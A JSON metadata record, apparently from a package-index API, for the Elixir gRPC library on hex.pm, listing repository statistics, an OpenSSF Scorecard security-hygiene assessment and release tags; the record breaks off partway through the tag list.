{"id":3598601,"name":"grpc","ecosystem":"hex","description":"gRPC client implementation for Elixir","homepage":null,"licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/elixir-grpc/grpc","keywords_array":[],"namespace":null,"versions_count":30,"first_release_published_at":"2018-03-21T17:00:35.167Z","latest_release_published_at":"2026-08-31T13:39:29.825Z","latest_release_number":"1.0.5","last_synced_at":"2026-10-07T02:28:17.061Z","created_at":"2022-04-11T05:58:45.491Z","updated_at":"2026-10-07T23:28:15.601Z","registry_url":"https://hex.pm/packages/grpc/","install_command":"mix hex.package fetch grpc","documentation_url":"http://hexdocs.pm/grpc/","metadata":{},"repo_metadata":{"id":10881614,"uuid":"63799837","full_name":"elixir-grpc/grpc","owner":"elixir-grpc","description":"An Elixir implementation of gRPC","archived":false,"fork":false,"pushed_at":"2026-09-08T14:46:33.000Z","size":16844,"stargazers_count":1528,"open_issues_count":54,"forks_count":265,"subscribers_count":26,"default_branch":"master","last_synced_at":"2026-10-06T04:32:22.307Z","etag":null,"topics":["elixir","google-protocol-buffers","grpc","grpc-elixir","http2","proto","protobuf","rpc"],"latest_commit_sha":null,"homepage":"https://hex.pm/packages/grpc","language":"Elixir","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/elixir-grpc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null}},"created_at":"2016-07-20T17:12:07.000Z","updated_at":"2026-09-30T22:01:00.000Z","dependencies_parsed_at":"2026-09-21T21:16:17.735Z","dependency_job_id":null,"html_url":"https://github.com/elixir-grpc/grpc","commit_stats":{"total_commits":491,"total_committers":63,"mean_commits":"7.7936507936507935","dds":0.3360488798370672,"last_synced_commit":"c26acb9157d00cd59b3adfa01fcde89806864e99"},"previous_names":["tony612/grpc-elixir","elixir-grpc/grpc-elixir"],"tags_count":29,"template":false,"template_full_name":null,"purl":"pkg:github/elixir-grpc/grpc","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/elixir-grpc","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/sbom","scorecard":{"id":373136,"data":{"date":"2025-08-11","repo":{"name":"github.com/elixir-grpc/grpc","commit":"faee2c15f1aeeb5cbc13c0ca5ad9be80aa79e6ec"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"4 commit(s) and 20 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 11/16 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:42: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:62: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:97: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:114: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:115: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/elixir-grpc/grpc/ci.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating elixir:1.8.1 to elixir:1.8.1@sha256:d2cf35091e85257aaf42c7a7e95e679693463be3bc675ca376dc581e55b0804e","Info:   0 out of  10 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   5 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-18T13:27:20.347Z","repository_id":10881614,"created_at":"2025-08-18T13:27:20.347Z","updated_at":"2025-08-18T13:27:20.347Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":343170754,"owners_count":38078873,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-10-03T21:59:58.778Z","status":"online","status_checked_at":"2026-10-06T02:00:06.537Z","response_time":86,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"elixir-grpc","name":"elixir-grpc","uuid":"48672524","kind":"organization","description":null,"email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/48672524?v=4","repositories_count":7,"last_synced_at":"2025-04-12T06:34:51.094Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/elixir-grpc","funding_links":[],"total_stars":1451,"followers":8,"following":0,"created_at":"2022-11-06T05:20:29.990Z","updated_at":"2025-04-12T06:34:51.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/elixir-grpc","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/elixir-grpc/repositories"},"tags":[{"name":"v1.0.5","sha":"12561eba7885779e66e173d5a106c05a0464e45d","kind":"tag","published_at":"2026-08-31T13:42:51.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v1.0.5","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.5/manifests"},{"name":"v1.0.3","sha":"56c34891389e16459453d489917e7820955362ab","kind":"commit","published_at":"2026-07-27T16:25:07.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v1.0.3","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"8b364e90978f9213949bb367578ef909a4b4c281","kind":"tag","published_at":"2026-06-30T12:05:22.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v1.0.2","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.2/manifests"},{"name":"v1.0.0","sha":"8105f803030f7f5ae1d722251ee6ab2e36878830","kind":"commit","published_at":"2026-06-15T17:04:47.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v1.0.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.0/manifests"},{"name":"v1.0.0-alpha","sha":"e35ff54c2bb5d4045f02b4265187187dd89452ec","kind":"tag","published_at":"2025-11-26T18:32:35.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v1.0.0-alpha","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v1.0.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v1.0.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v1.0.0-alpha/manifests"},{"name":"v0.11.5","sha":"97e189743167093c86cc702700b058488505ff66","kind":"tag","published_at":"2025-11-14T12:13:15.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.11.5","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.5/manifests"},{"name":"v0.11.4","sha":"723e8a46f29034ec523621c82030e95213186e8c","kind":"tag","published_at":"2025-11-07T13:24:04.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.11.4","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.4/manifests"},{"name":"v0.11.3","sha":"bc775b99a1f05bebea55d7412884e1afc4ea77f0","kind":"tag","published_at":"2025-10-23T19:31:21.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.11.3","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"ab280766066b239f13d0d3d167476510fb939b21","kind":"commit","published_at":"2025-10-16T00:21:37.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.11.2","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.2/manifests"},{"name":"v0.11.0","sha":"db695ec1d7ebbde87d94ddbe7f67a0345ffbc6a5","kind":"tag","published_at":"2025-10-14T00:49:07.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.11.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"dae7deb5f8db4b0d7a2abe1a8aa20bd2a9de04cf","kind":"tag","published_at":"2025-07-12T00:00:18.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.10.2","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"781a7cc442b864ba8442eb5a2fdf2a1110e45cf4","kind":"tag","published_at":"2025-05-10T02:29:17.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.10.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"2cfad8a1ddd89d76be01db306469f5f213925934","kind":"tag","published_at":"2025-05-06T00:49:15.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.10.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"863f9462a2cae3debee45064e6ec21edbc51816b","kind":"tag","published_at":"2024-07-17T02:31:50.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.9.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.9.0/manifests"},{"name":"v0.8.2","sha":"da06250e6a498b7a38f47e33ad5f6b69847fcf5d","kind":"tag","published_at":"2024-07-13T14:00:05.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.8.2","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"969f9c15084d8474f5f9cea45288a836032550cf","kind":"commit","published_at":"2024-04-08T01:29:48.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.8.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"eda2edc2f43010517b9f7992ccb181792175a17f","kind":"commit","published_at":"2024-04-06T00:24:06.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.8.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"1d51820278dbbc9f9a10c39383fa413cf3cc8031","kind":"commit","published_at":"2023-09-05T07:23:02.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.7.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"3cbd100c5aaf49720b36b67064e9e38530cacaea","kind":"commit","published_at":"2023-06-14T05:28:00.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.6.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"a3e44455f12e63650a0066867883613569c7a336","kind":"commit","published_at":"2022-07-27T05:41:07.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.5.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0/manifests"},{"name":"v0.5.0-beta.1","sha":"0a457dd6ff33eb0a57fb6275d7dea35c9f5fdcce","kind":"commit","published_at":"2020-03-21T08:52:44.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.5.0-beta.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.5.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.5.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0-beta.1/manifests"},{"name":"v0.5.0-beta","sha":"f9402719d86b61d1d57fed9edfaf597ec3606b65","kind":"commit","published_at":"2019-12-24T03:39:27.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.5.0-beta","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.5.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.5.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.5.0-beta/manifests"},{"name":"v0.4.0","sha":"e45282526107417bd54f57bb8298b52a7c272ccb","kind":"commit","published_at":"2019-07-15T07:31:49.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.4.0","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.4.0/manifests"},{"name":"v0.3.1","sha":"387eb5df5413fe89d7b62246d6e5b094fd82e0f5","kind":"commit","published_at":"2018-12-07T21:42:52.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.3.1","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.1/manifests"},{"name":"v0.3.0-alpha.2","sha":"dcdb5ebacf3957c989782ab63acfb615771fcfc6","kind":"commit","published_at":"2018-04-17T14:40:40.000Z","download_url":"https://codeload.github.com/elixir-grpc/grpc/tar.gz/v0.3.0-alpha.2","html_url":"https://github.com/elixir-grpc/grpc/releases/tag/v0.3.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/elixir-grpc/grpc@v0.3.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/elixir-grpc%2Fgrpc/tags/v0.3.0-alpha.2/manifests"},{"name":"v0.3.0-alpha.1","sha":"ad8c47810f8d9826d82ea41330846bc2c252a2ae","kind":"commit","published_at":"2018-03-24T02:51:59.000Z","download_url":"https://codel